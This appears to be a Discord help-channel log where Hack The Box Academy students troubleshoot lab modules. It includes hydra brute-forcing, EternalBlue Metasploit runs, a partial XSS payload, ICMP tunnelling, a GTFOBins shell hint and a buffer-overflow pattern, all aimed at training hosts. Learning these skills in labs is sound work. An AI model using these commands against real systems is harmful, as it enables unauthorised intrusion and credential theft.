#modules
Ok?
you need to bruteforce a username and password
IPC$ generally isn't a directory (per se)
Well, I did the same thing with CASSIE, and still got the same error message
did you find their password?
Yes
and did you connect to their share?
is the password the first in the password list?
:)
also in your connect command i don't see you pass the -U for the user
Hello! I'm currently a little bit stuck on the Password Attack Modules. I succeeded in getting a meterpreter on 10.129.202.23. This target has an IC that allows me to connect to 172.16.1.0/24. It has the IP 172.16.1.5.
I also have a reverse shell on 172.16.1.10.
My goal is to put a msfvenom payload on 172.16.1.10, so that I can then do a reverse port forward to my kali linux, so that I can have a meterpreter of this target 172.16.1.10 on my kali. But I can't find a way to transport the file from my kali to 172.16.1.10, or from 172.16.1.5 to 172.16.1.10.
smbclient -U "USERNAME" //ip/CASSIE/
<password> 1..0
wtf? Hold on
Well yeah, that's what I did
What I found odd was the username and the password were the same ones I had to use for WinRM
try bruteforcing C
That's weird because I used crackmapexec, and that's the result I got
well did you add the -local-auth?
maybe it's --local-auth
for cme/nxc
it's been a min i'd have to look at the man page
yeah it's --local-auth
--continue-on-success
Let me try that
but in reality you could make this easier on yourself by just doing smbclient -U "" -L //ip
and make an educated guess as to what the username is
you can additionally do --shares
in cme/nxc
Same thing, what the heck?!
--shares will enumerate share access
but again
you're making this way harder on yourself
look at the sharenames and tell me you can't make an educated guess as to whom the user may be
I'm wondering if I messed something up when I had to use the same username and password for WinRM
That's the thing, I got the shares.
dude
I'm trying to get the flag
just because you can LIST shares doesn't mean the user has access to them
look at the sharenames
when you list them
and think
:)
the sharename isn't any of the x$ shares
each service has a unique user for them
you won't be able to enumerate another service with the creds you find
because you're not connected to the fileshare that has anything
as i've been saying
you generally can't enumerate IPC$
but also
you need to be the right user to enumerate it
if you're not the right user, smb says no
the user is c*
--continue-on-success btw is so that it continues even after it hits a positive result
but any valid user on the machine can list the shares
Wondering if anyone can shed some light on what I'm doing wrong.
Module: Web Fuzzing - Virtual Host
The input is: $ gobuster vhost -u http://inlanefreight.htb:42042 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
The output is: Error: error on running gobuster: unable to connect to http://inlanefreight.htb:42042/: Get "http://inlanefreight.htb:42042/": dial tcp: lookup inlanefreight.htb on 103.86.96.100:53: no such host
But when i run: $ gobuster vhost -u 94.237.57.131:42042 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
I only get "Found: Status: 400" enumerations.
check your /etc/hosts file dude
the error shows a different publicIP
Is there a way I can view how the modules solve certain questions?
hi I'm on the last question of assessment. I identified I am supposed to use Eternal Blue to exploit this machine. I know the machine is vulnerable but I am getting this error:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 172.16.1.5:4444
[*] 172.16.1.13:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.1.13:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard 14393 x64 (64-bit)
[*] 172.16.1.13:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.1.13:445 - The target is vulnerable.
<SNIP>
[-] 172.16.1.13:445 - Did not receive a response from exploit packet
[*] 172.16.1.13:445 - Sending egg to corrupted connection.
[*] 172.16.1.13:445 - Triggering free of corrupted buffer.
use a different exploit
but it says its vulnerable and the name of the machine has the word "BLUE" in it
there's a handful of eblue some include exec in their name
i'm aware
ok got it thanks
hey qq: I'm working on the Linux privilege escalation / environment enumeration section and I was wondering if I can get any hints on where to be looking. I've looked in home directories, /etc/passwd, /tmp, /var/tmp. I looked on GTFOBins for different ways to escalate with /bin/ncdu and I guess I'm just not understanding what I'm missing.
i believe you're thinking too hard about this
I'm trying a different exploit now. This one is giving me an error that says exploit completed but no session created:
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 172.16.1.5:4444
[-] 172.16.1.13:445 - Rex::ConnectionTimeout: The connection with (172.16.1.13:445) timed out.
[*] Exploit completed, but no session was created.
the man pages for it will be helpful
is the LHOST right?
I tried two different LHOSTS
just make sure you don't mistype :)
I do too like / man pages for machine I'm on
there's a specific thing with ncdu that allows you to spawn a shell with it
:)
now I have right LHOST I think because got different result:
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 172.16.1.13:445 - Target OS: Windows Server 2016 Standard 14393
[*] 172.16.1.13:445 - Built a write-what-where primitive...
[+] 172.16.1.13:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.1.13:445 - Selecting PowerShell target
[*] 172.16.1.13:445 - Executing the payload...
[+] 172.16.1.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
but still no session created
is it the port number?
don't adjust the port
i would say at this point reset the target and try running it again
this assessment can be dumb sometimes
Try bind
I reset the target I got same result:
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 172.16.1.13:445 - Target OS: Windows Server 2016 Standard 14393
[*] 172.16.1.13:445 - Built a write-what-where primitive...
[+] 172.16.1.13:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.1.13:445 - Selecting PowerShell target
[*] 172.16.1.13:445 - Executing the payload...
[+] 172.16.1.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
wrong LHOST
make sure you do ip a; as a shortcut in msfconsole, if you know the interface name, you can just do set <interface name> and msfconsole does magic
cheese and crackers! FINALLY!!!
I saw where I went wrong
I tried all three different LHOSTS and it wouldn't do anything
Try bindshell
all three LHOSTs give same result
try one of the other exploits
Ok, on to the next one
I tried every lhost
Metasploit right?
the lhost should be the 172.16 one
wrong
I know I tried that one
shells and payloads module
Oh yeah
reread my edited comment
another thing is potentially changing vpn region and respawning the target, and seeing if that makes it work
¯\_(ツ)_/¯
wait I got a meterpreter
got flag
Nice
okay so I'm just not getting it I've read through the section in the man pages about shell and saw this command
"export NCDU_SHELL=vifm
ncdu"
It spawns a shell in the dir I'm in but how do I know if i have used it right or not
also sudo is helpful
sudo has some fun things you can do like with id # instead of username
try sudo -l to see what you can actually run as root
always see what you can (su)do
literally the first command i run when i get a foothold in linux
anyone else having VPN issues? Wasn't joining on US5 so i went to switch and only have access to the generic 'academy-regular'
try hard refreshing the page
that don't look right

yeah i also logged out and logged back in....may clear web browser i guess
or i'll try private browser first
private browser worked, looks like it's time to delete all the web things
just ctrl + shift + r
^
sorry i guess not everyone knows what hard vs soft refresh means
soft refresh is just the ctrl+r that keeps cache; you'd note the lack of a get request in the network tab
ctrl+shift+r does a clear of cache for the loaded resource
yeah ctrl+shift+r didn't change it either
appreciate the tips though, i definitely wasn't aware of the hard refresh
ye
basically forces your client to call the server for an update
instead of relying on what's in your cached page
fuckin lmao the hostname
keep my hostname out of your fuckin' mouth
Pivoting, Tunneling, and Port Forwarding
RDP and SOCKS Tunneling with SocksOverRDP. This assessment is just broken. I can't connect, and every time there is a different problem
try another region
also make sure to modify the rdp settings as shown in the module for connection stability
finally
congrats
Admins, I have completed all of the SOC path except 2 sections, which I am unable to complete due to RDP issues. I have tried all of the troubleshooting methods. The machines just freeze or I encounter weird problems like the machine just dropping the RDP connection. Can someone help me with these 2 sections so that I can complete the path?
I have been stuck at these 2 (Windows Attack/Defense) for the better part of a week now
Any hint mode xss section phishing. When I send url it says issue sending url what the issue in that no clear hint is given by htb
http://[target_ip]/index.php?url=[payload] iirc
Been a hot minute since I finished it
Let's not share the payload
when i send it says issue in sending url
And does that payload work just fine on your end when testing it?
yes i tested it works fine but when i go to send.php it says issue in sending url
any hint why it not working
Try url encoding your payload
¯\_(ツ)_/¯
Did you remove the port from the url?
Oh wait, I was thinking about the advanced xss module
ohh no
Did you include the port in the payload that sends to you
Well.. are you hosting the web server on port 80?
yes
Ah
Lemme dig up my payload
??
no if you've properly escaped the tag that your payload gets sent to it should work
though from what you showed it looked like you started with ( for some reason (unless that was some typo or something)
if that wasn't, i want you to inspect the page source of where your payload is getting placed
and also don't forget to add the html comment at the end
<!--
i absolutely hate the fact that I can read the Hex code/url encode for my payload
i'm telling you something you did to escape was wrong
it shouldn't start with ( or'
can u share your payload
Uh oh. Your mind is starting to talk fluent hex
nah i've just revisited this payload and know what it is without the url encoding
all the "> and stuff man
so what should i have to do now
go back to the drawing board and inspect the page source when you throw anything at the url parameter
Go over the section again and follow it step by step
Apply it to the exercise
look at EXACTLY where your payload is getting dropped
is it getting dropped, for instance, inside a tag, in between quotes
just from seeing what i've deleted from you
the beginning of your payload is wrong; the rest is right
you haven't escaped the matrix
oi
Spoilers please
do i need a bigger stick
Yes
sorry that why i have sended half payload
the payload is a spoiler since it practically gives away how to get the answer
the payload portion is what you've been sending
http://ip/phishing/index.php?url=
ok
it is mention in section
i just shared what is mention in section
it's still revealing content that's technically paid
ok
only t0 content is "free" and able to be shared with no consequences, according to HTB ToS
:)
ANYWAY
neway
;document.getElementById('urlform').remove();</script><!-- my last part is like this
i've given you the hint on where to look first
inspect where your payload is getting dropped
i didnt get it could u please make it easy
can't say it any more clearly than i have been
the module shows you in-fact
about inspecting the page source
okay.. let me check it again
anyway whenever you're crafting any sort of web injection payload, you want to know at what element your payload is getting dropped
the only way to see where it's dropping in at, is to view the source
and I am not giving you a hint in DM
How long is your streak @fathom pendant
21
Nice! I'm at 24 but probably losing it
Off work - and wife/kids are keeping me busy lol
Hello, anyone done the Skills Assessment of the Server Side Attack Module? The assessment gives us a low-privilege user credential but I couldn't find a way to log in
Anyway I already got the flag without login but just wondering where I can use that credential
it is in image tag
correctly observed
note exactly where in the tag it's placed
:)
(this is also why this is dangerous)
why url : phishing or phishing/send.php
?
i just meant having user input being directly placed into your html form with no validation
yes there is no validation in user input
"input" if i do like this : "payload is start adding quot ""payload"
why not just escape the image tag? :)
i cant understand everything is fine when i send the malicious url to victum in send.php it saya issue in sending url thats all
well
that means there's something wrong with your payload
is what i'm getting at
Moduel: pivoting, tunneling & lateral movement
Section: ICMP tunnel
I have compiled the static binary and had it running on the ubuntu pivot host (whose ip is 10.129.202.64) w/ || sudo ./ptunnel-ng -r10.129.202.64 -R22 ||
I also had it running to connect to the tunnel from the attack host to the ubuntu machine w/ || sudo ./ptunnel-ng -p10.129.202.64 -l2222 -p10.129.202.64 ||
after that I try to connect to the tunnel and forward it to 9050 for proxychains: || ssh -D 9050 -p2222 -lubuntu 127.0.0.1 ||
and when I scan the remote target address w/ command || proxychains nmap -sT -sV 172.16.5.19 ||, it returns that all hosts are down or filtered.
Did I mess up the tunnel building procedure?
how'd you compile the binary
just use autogen.sh
and follow this guy
#modules message
there ain't a configure file without compiling it first w/ autogen.sh
Can someone help me in the Introduction to Windows Evasion Techniques - Static Analysis?
I've compiled the executable in the Dev Host, tested, got a callback to msfconsole.
Uploaded the file to the directory, check says it's not detected by Defender but no flag is created
https://academy.hackthebox.com/module/51/section/1845 Why can't I connect? I reset the IP and it doesn't work.
because you are using the wrong credentials
That's impossible. I copied and pasted it.
it is possible
especially when you're using the wrong user name.
Yup
which is understandable I guess since pretty much every other exercise I've done uses 'htb-student'. haha
I'm stuck on the first question in the Practical Digital Forensics Scenario module. I've done base64 decoding from the suspicious PowerShell, then I looked for the payload in the GitHub repo but there were no results. Can anyone help me?
holyshit
when the moment hits
sure i can help! could you provide more details about the first question
Any idea why there is no explanation of modules in a video style?
Sometimes reading gets me exhausted
maybe they primarily focus on hands-on practical learning experiences, which is why most of their content is text based and interactive
also if they want to add/edit a module a video of the module would have to be redone and that's a lot of effort
+1
Yeaa I understand but bro sometimes...
but just about everything in cyber is all text based, the code, the reports, the write-ups, the documentation
Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer.
for this you need to dump the memory of the powershell process; tools like volatility or rekall may help you ||volatility -f memory_dump.raw --profile=PROFILE malfind -p 6744||
https://academy.hackthebox.com/module/51/section/470 I have absolutely no idea what the question here is asking, can someone please tell me
I tried the answers one by one.
after looking for suspicious or interesting content, look for patterns, functions, names, specific code in the memory dump that match the tools or functions in the PowerSploit GitHub
I've been working on a Linux privilege escalation problem that involves special permissions, specifically the setuid bit. The question I'm trying to answer is "Find a file with the setuid bit set that was not shown in the section command output (full path to the binary)." I ran the suggested command find / -user root -perm -4000 -exec ls -ldb {...
how did you answer it then
imposter lmao
The answer is that I figured it out through trial and error
Hi there, I'm trying to solve an Academy question, and I'm scanning for services running on non-standard ports; should this be taking a crazy amount of time, like 1hr or more?
that's too vague of a question without seeing the actual scanning technique
Reduce scan options
I'm scanning all ports, since a service is running on a non-standard port
you could try using -T5
or -T4
though the faster the scan, the more likely it is to miss a port
first run a basic nmap test: nmap 10.129.250.56, later specify ports like this: nmap -p 21,22,
Oh so I already did do that and found my answers, on this particular question, I'm looking for telnet running on a non-standard port, that's why I'm scanning all of them.
Thank you, appreciate the help.
it could also be VPN issue, I would try a ping too and if jitter is all over the place, that would slow down the scan
You're right about that, it's more of a connection issue, there's a bit packet loss too
yeah, I would switch vpn location then, that does the trick for me sometimes
can anyone tell me why my proxychains doesn't work ?
Okay I'll go for that, but the T5 switch is much better from what I can see, if that fails I'll change the vpn location, Thank you.
Which part? And please show us what you did. We can't answer you based on your question as we don't have a magic crystal ball ;)
Hey guy, can someone give me a little nudge on Web Service & API Attacks - Skills Assessment please
did you put the socks4 or 5 IP and port in /etc/proxychains.conf?
Is job role path free to access guys ?
What exactly is not working?
Only the Tier0 modules are free of charge
Anyone here can help me with a problem in Linux mint?
Can anyone kindly take a look at this question? I am still at a loss on ICMP tunnel pivoting
How much I have to pay for learning and attending penetration testing job role path?
depends on how long you finish the path
subscription plans starting from silver would allow you to access everything in the job path
student is even better but you need a .edu email account first
.edu email will be provided by the clg right?
normally yeah?
How much is for subscription ?
Learn about the different Academy subscriptions.
I parsed the wsdl with burp wsdler copied the post request parameters (I think), but I can't get to run it ...
I do it with the python script ...
I get user ||kundrill0|| ...
not sure what I'm missing...
anyone know if there is problem with the AD enumeration & attacks section? I try to xfreerdp in to the boxes but its just a black screen then disconnects
the black screen you just hit enter it works, but the rdp session randomly hangs and disconnects...
Pretty sure I just saw someone asking about this the other day. Have you searched here with the search function to see if a similar question was answered or if a solution was previously provided?
hey , im doing pass the ticket in linux,
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
i got the flag but it tells me that my submission is wrong
I don't recall this flag, but generally some things to try are to ensure there aren't any spaces before and after the flag. If that doesn't work, try refreshing the page and try to submit it again. Can also keyword search that and see what others may have previously recommended.
did all of that but nothing
I'm at my computer now, so I can check my notes. What module is it? Password attacks?
yep
Send me a DM.
Hi everyone, I hope you're all well,
for the "Attacking Common Services - Hard" module I've already solved it by
first impersonating a J User...
using testadmin of the linked server LOCAL.TEST.LINKED.SRV to execute commands
using xp_cmdshell directly to get the flag, apparently there's another way to log in or get the admin hash, and I tried but couldn't
(using responder to capture the hash), I'd like you to please help me with the second method
thks...
out of mind, if anybody can help I would appreciate it
Try sending XML data
Remember that you have to encode special characters in XML
You donβt need any user
I did
Take another close look at the Xpath section. You don't have to bruteforce anything
wait what u mean xml ?
Send me a dm
Is there a wiser way of doing windows-to-windows file transfer other than base64 text copy and paste and decode?
I figured that impacket-smbserver, python server etc can be used in a Linux attack host, but what about windows-to-windows in a real engagement? (maybe cifs?)
you can mount a drive in an rdp session and copy/paste the file you need
just enter when you see the black screen
No, you don't need all the data. Look in the module how you can filter data.
this does work to get rid of the black screen but it also disconnects after a couple of minutes and have to keep relaunching the rdp session
DM
That's a connection issue then. Are you using the tcp vpn, also /timeout:9000
I did it using udp vpn, but also tried it using the pwnbox
Well if you're trying with pwnbox, turn off the vpn on your vm
Has anyone done : "Error-based SQL Injection" section of the "Advanced SQL Injections"
I dumped the database, found the user potus4 as requested, took the java code that does the password reset and swapped the variables with the dumped user information. Now HTB is telling me my password reset link is no good. I swear I'm so confused, everything looks good. I tried in python, java and the password reset link is always the same, so I don't know why HTB won't accept it as the answer
Anyone completed the WhiteBox Attacks module, i need just a bit of assistance on the client side prototype pollution
I'm willing to swap info if you've done mine lol
which one is yours?
See a few posts above, I'm stuck on this thing
Yep i have done it, ping me in DM
Hi
good day. I am running into a mental block with a couple of questions in the Linux Fundamentals System Information
Then it's best to take a break
I've been working on this module for 5 days LOL
Take your time. It's not a race
It also helps to ask your question
We're not mind readers we don't know what you're struggling with, just that you're struggling
yo everyone i don't understand a thing on the course https://academy.hackthebox.com/module/113/section/1094, I was able to get the flag with metasploit but not with notification creation. Has anyone been able to get it this way?
This question: What is the path to htb-student's home directory? I used the $ echo $ Home and the path that was given is wrong.
You need to ssh to the target
Make sure you spell the username right when you're testing the creation
prtgadm1 (from the example) not prtgadmin1
I'm having trouble with gobuster vhost scanning: academy.hackthebox.com/module/280/section/3132
Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb.
I ran the command gobuster vhost -u http://IP:PORT -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain, replacing IP:PORT with the target's ip and port number. It finished the scan after 4 thousand requests, and checking with wireshark, the requests are correctly formatted. It did not return any successes. What am I doing wrong?
OK, I'll test when I get home thx
Wrong?
You need a domain to append
hello, can somebody help me with a module of CDSA: Windows Event Logs & Finding Evil
On the skills assessment question 3 : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.e
I'm really blocked to continue... I don't understand how to find this
try controllers
I use the target that is provided (ex. 1.1.1.1:1234) in place of IP:PORT
That's still not a domain
A domain is like google.com
Or inlanefreight.htb
What does the question/"vhosts needed" tell you?
Nop
this is the question: Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb. the target system is the ip and port I have. I used the command provided above in the guided instruction section
inlanefreight.htb
I believe with gobuster it's -d or --domain
(Or you add it to your /etc/hosts)
ah ok
??
Also in future use the module and section name, not just the endpoint (/module/...)
Because that really isn't helpful
Intro to Active Directory
Also try the singular, not plural
/Active Directory Objects
Module: info gathering web edition
Section: virtual hosts
oh ok I'll try to remember that. even after adding the domain to /etc/hosts, gobuster gives an error:
Error: error on running gobuster: unable to connect to http://inlanefreight.htb:81/: Get "http://inlanefreight.htb:81/": dial tcp: lookup inlanefreight.htb on 8.8.8.8:53: no such host
this happens with and without specifying the port 81
Or whatever section you're working on
Module: Intro to Active Directory
Section: Active Directory Objects
Because you fucked up your hosts entry
web fuzzing
virtual host and subdomain fuzzing
You don't include the port in the hosts entry
I added this line: IP inlanefreight.htb
yes, I did. I also tried without specifying the port
Did you specify http://inlanefreight.htb:PORT ?
Does any one know why on Web Attacks > advance file disclosure I can't use CDATA method to include /etc/passwd but I can use the regular method
I know that my payload works
Not all methods shown may work
I ran both these commands:
gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
gobuster vhost -u http://inlanefreight.htb -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain
the first command is exactly the same as is given by the section, just with a different capitalization for "seclists" in the path
Why are you specifying port 81?
It's a docker container with an ip:port no?
The :81 in the example is to show that you can specify a different port
that's the thing it works on flag.php, but not on /etc/passwd
which port do I use?
¯\_(ツ)_/¯
The one given by the target spawn
It's a publicIP:PORT
The publicIP is what you put in /etc/hosts with the domain, and the port is what you use in your requests http://domain:port/
ah I tried that. it doesn't work
I took the inlanefreight.htb ip and the port from the target spawn (a number). the error is the same as before, just with a different port (mee6 doesn't like me sending a similar message again)
sigh what does the entry look like?
If it's ip:port in the hosts entry, that's why
But also if you read and follow #welcome you'll be able to post code blocks/formatted messages
└──╼ $cat /etc/hosts | tail
# Host addresses
...
# Others
IP inlanefreight.htb
is there an "easy" way to transfer files from Windows to Linux? taking apart the b64 encoding, nc and shared drive on rdp
I want the full actual entry that's in your file
Not shortened
Shared folders
uploadserver
If a vm
Xfreerdp has the /drive: option, which mounts on the \\ts-client\ share
└──╼ $cat /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 parrot
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
# Others
IP inlanefreight.htb
i see, but if i ended up in a windows machine via revshell and there is not rdp service up?
thank you all btw
Beat me to it
That's why it's not working lmfao
oh. it gave me the command echo "IP inlanefreight.htb" | sudo tee -a /etc/hosts
... you replace IP with the spawned IP
ohhh that makes sense
It can't route to something if it doesn't know what it's routing to
ok it's finding stuff.
I got the answer. thank you
somehow I always have the stupidest mistakes
Could use a different perspective for Active Directory Enumeration & Attacks, Privileged Access section. I have a cypher query I can run in BH to view all principals who have PSRemote privileges but my BH query does not return anything while the course (and the assessment question) suggest it should. Why is that happening since the data I've dumped is as shown in the course
This is a channel for academy content
Which module is this for?
Hacking is illegal
Either way is not the place for this
That's what they all say. But this is not the place to ask/share exploits. It's for help with academy modules only.
Hello, I'm doing the question on the "Data Movement" section of the "Intro To Assembly Language".
They want me to make some changes to this assembly code but it is throwing a SIGSEGV on the very first instruction. Doesn't seem like that's intended.
global _start
section .text
_start:
    mov rax, 1024      ; rax = 1024
    mov rbx, 2048      ; rbx = 2048
    xchg rax, rbx      ; swap: rax = 2048, rbx = 1024
    push rbx           ; push 1024 onto the stack
    ; no exit syscall follows, so execution runs past the last instruction into whatever bytes come next
This is the GDB output
──────────────────────────────────────────────── code:x86:64 ────
0x401005 <_start+0005> mov ebx, 0x800
0x40100a <_start+000a> xchg rbx, rax
0x40100c <_start+000c> push rbx
→ 0x40100d add BYTE PTR [rax], al
0x40100f add BYTE PTR [rax], al
0x401011 add BYTE PTR [rax], al
0x401013 add BYTE PTR [rax], al
0x401015 add BYTE PTR [rax], al
0x401017 add BYTE PTR [rax], al
──────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "mov", stopped 0x40100d in ?? (), reason: SIGSEGV
──────────────────────────────────────────────── trace ────
[#0] 0x40100d → add BYTE PTR [rax], al
────────────────────────────────────────────────────────────
Am I doing something wrong? Is this intended?
that's the last instruction in the GDB output. did you set a breakpoint?
Ah, sorry, I completely misread the output. I didn't set any breakpoints, I tried to just run the program as is to ensure that everything was working and the error threw me off. Should have done that
Hello, for some reason I'm really stuck on the Attacking Common Services module at the SMTP section. I understand what needs to be done, but when using hydra to brute force the password I have no results (I have checked the forum and YouTube videos to confirm that I was doing the correct thing). Can anyone please help me out?
did you first get a username?
yep
and am using the full username to perform the bruteforce
also sometimes you need user@domain sometimes you just need user
I have tested with both but still no luck, may I send the command I'm running for the bruteforce here?
redact the username; i also assume you're using the given wordlist from the module?
hydra -l <username> -P pws.list -f 10.129.136.69 smtp
Yes using the wordlist from the resources
i generally do protocol://ip but it doesn't matter too much
try another mail protocol ? (SMTP usually runs alongside IMAP and POP3)
I also tried with pop3 but no luck, will attempt with imap
sec
is there any chance that the specific target host has an error or is that unlikely?
try with rockyou
if the given wordlists don't work, always fall back to rockyou
Okok will try out now
also don't worry about the expected time it says for rockyou to complete
expected time != actual time
it's easy to see 143333 hours and go "UHHHH"
I couldn't find anything with rockyou either.
I don't think it's a wordlist issue though
you can't have run through rockyou that fast
also in this instance it's user@domain for the login
still running, it timed out before for some reason
the password isn't that deep on the list
you're running default threads yeah? (like 16 or something?)
should crack nearly instantly
my syntax was hydra -l user@domain -P /path/to/rockyou.txt smtp://IP
and like almost the second it popped it started it found it
:)
Yep, should I change that?
interesting
i'd reset the target and test with a new target
Will try that, thanks!
(note I just tested with a fresh spawn, and it worked)
Hello everybody, sorry for my bad English but I really need your help. I am being harassed a lot over a YouTube account that I created when I was little. I want to delete it but I lost my codes and my email; I don't even know which email is associated with this account. I really need help, I really want all this to end, please help me
If someone can just delete the account for me, it's a very small account with like 15 followers, it should be easy
YouTube *
You're right, resetting the target did the trick - thanks a lot for your help π«Ά
Delete *
We canβt help you with this
Oh why
We canβt help you with this
Hacking YouTube is illegal. Asking someone to perform illegal things is also against discord ToS
But no one will realise that the account was hacked because I have like 15 followers, and the last video was in 2017; the account is forgotten
Contacting YouTube support again is your only option
We can not help you.
You can't even just tell me what the e-mail of the YouTube account is
And I will do the ready
Rest
No. Please stop asking about help with your YouTube problem. We won't help you
Ask YouTube support
Okay I am sorry bro…
I am curious how you all did Footprinting Medium, if you remember. If I remember correctly you weren't supposed to run exploits, then I got sick and tired and did it anyway to get LPE.
I body-searched each and every server in the subnet and outside lmfao, the sa creds I found didn't do jack and another hash refused to get cracked and I couldn't use it to PtH. After spending more time than I think I should've, I just said fk it and ran the PrintNightmare exploit I always have saved
No problem, I hope YouTube support responds asap. You can always try to report your videos for impersonation or so.
Tried playing by the rules but sometimes I'm too impatient
the whole point is to do it without running exploits
the module is all about enumeration
Then i did wrong, i was unsure because it was only mentioned in the first part
But man did i enumerate
Yes i Will try it
you did not enumerate thoroughly enough then
there isn't even a need to ping sweep because it's only one target
Overcomplicated it a bit; during the enumeration I saw that it wasn't a DC
Thought the DC was the goal
it's a single target though..
Nah wait a second
When I said I literally enumerated every single corner, I wasn't lying. Looking at how it was supposed to be done originally, it was one of the first things I did
And it did not work for me
After that I started ping sweeping because I thought that wasn't it
Thought it was a red herring
but you're given a single target
and you can only spawn a single target, it isn't a network
Don't know how it works in HTB, but some CTFs I've done before started with one target, and considering it is about enumeration, and not being able to use the credentials I found, I started thinking I'm maybe supposed to look at all the other servers
To use the credentials
Or find more credentials
you will be told if you are working with a single target or a networked environment
and in the given scenario, it tells you that you're working with one server
Alright, i used remmina, have you heard abt it being a problem before
Because that's what I used trying to do the original method
usually it's xfreerdp that has issues
Remmina ftw
i also wouldn't assume that exercises give you red herrings
given that these exercises are designed to test you on what you're taught in the module
they are not CTFs
virtually every exercise can be completed with what is taught in the module, and doing stuff out-of-scope defeats the purpose of the exercise
(i don't care to read up) what module/exercise is he working through?
Footprinting - Medium Lab
seems like it could have been an issue with the lab environment, but considering i had the same issue as well and got through it, might be a user error
50/50
yeah my notes on this lab are pretty streamlined
service A --> Service B --> test for reuse --> Success (dumbing down my flow a bit here, not saying what services for obvious reasons)
a proper scan of the environment shows many doors ed boi
i believe i found something important by just clicking around, but apparently i just had to do something else related to a service to find it easier 
then just test for password reuse/runas (Though UAC doesn't let you copy/paste)
Hello guys, any hints for Skills Assessment - Advanced SQLi? I'm stuck at getting the 2nd flag, the RCE one. I used $$ to bypass single quotes and compiled the exact Postgres version. But somehow it does not work = =!
That's also exactly why I wrote here. Because after scratching my head for more than an hour, I felt that something was wrong.
Found the creds directly after enumerating
When i initially RDPed
well yes but that initial user doesn't have sufficient permissions
so gotta do even more enumerating
enumeration is an iterative process
if user cannot access files, find someone who can :)
I know. That's why I said I found the "flag" when I RDPed (initial foothold), because I went through every nook and cranny
And I'm talking about it here because I knew something was wrong. I looked up the real solution as opposed to my hack; it was one of the first things I tried
¯\_(ツ)_/¯
if you're unsure to send a support ticket do this:
spawn a fresh lab, repeat all your steps
repeat the official steps (assuming you mean the annual walkthrough)
if you can repeat steps and it works, then it was just that instance that was bugged
if you can repeat steps, and it doesn't work it's more likely to lean on the side of an HTB issue
there was a bug after a maintenance period (unsure if it's still lingering) where some modules that have internal networking components (like AD Enum & attacks) weren't spawning properly on US, but were on EU (by US i mean ALL of the US servers at the time)
it really affected the password attacks -- PtT from linux section because it was giving an invalid Time/date stamp
(Unix 0 time)
I'll try it again in a bit, but it hasn't been all that good here in EU I'd say either; I mentioned earlier that a box would take upwards of 15 minutes to spawn for me
You don't think I tried bro
come to US
but yeah
there's rarely target issues
and it's more often user error
bc i've run into a few instances of "i swear i tried that"
only to go and see it nowhere in my command history
I'll try it again, but how hard could fucking up with remmina be… literally fill in 2 fields and you're done
And i tried all combinations and accounts there were lmfao, lowercase, uppercase, first dudes password, other found password on all local accounts
you didn't try the most powerful local account
I did
The first, because that's the only other account, I tried to be ambiguous
So you must understand why I'm confused asf coming here, because I knew that how I did it couldn't be right
I'm going to try the original solution
And I'll report back if it was just me who fatfingered something
having trouble with this question can someone help?
What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
the section gives you an example command with find
it also, again, helps if you're ssh into the target machine that's spawned
most config files are either .cfg,.conf, or .config
usually .conf is a safe bet though
hey team, (module Intro to C2 Operations with Sliver) I have an arm64 and I am having a problem downloading donut https://github.com/TheWover/donut — has anyone downloaded it on arm64 Linux?
yes ive spawned the target. and ive tried almost everything and keep getting responses like this
are you ssh into the target?
also the pwnbox is not the target
if you're referring to the little window with "spawn instance"
any help?
2> /dev/null at the end
also you don't need to do --user root
take note that the find command recursively searches through all directories from the base one you give it; so if it's trying to access a protected directory (aka not your user/root) then it's gonna display those errors
can someone provide any hint for CPTS exam ?
2> is the bash redirect of file descriptor 2 (stderr) to another file (/dev/null)
fuck no, you're on your own
thanks
you literally agreed to doing the exam on your own when you started it
the only place you can find answers to move forward is on the exam environment itself and looking back through modules for a method that may be relevant to where you're stuck
getting rickrolled in an HTB module
"Suppose we wanted to through spaghetti at a wall"
that's the Web Attacks module?
i swear i encountered that in one of the modules i've recently done
yeah IDOR
imo
all the methods there are really fuckin dumb (in the sense that, they just work like that)
yeah I haven't taken any notes on idor yet it feels pretty basic
none of these worked...
then try .conf
run $(python3 -c "print('\x55' * (1040-4-150-100) + '\x90' * 100 + '\x44' * 150 + '\x66' * 4)")
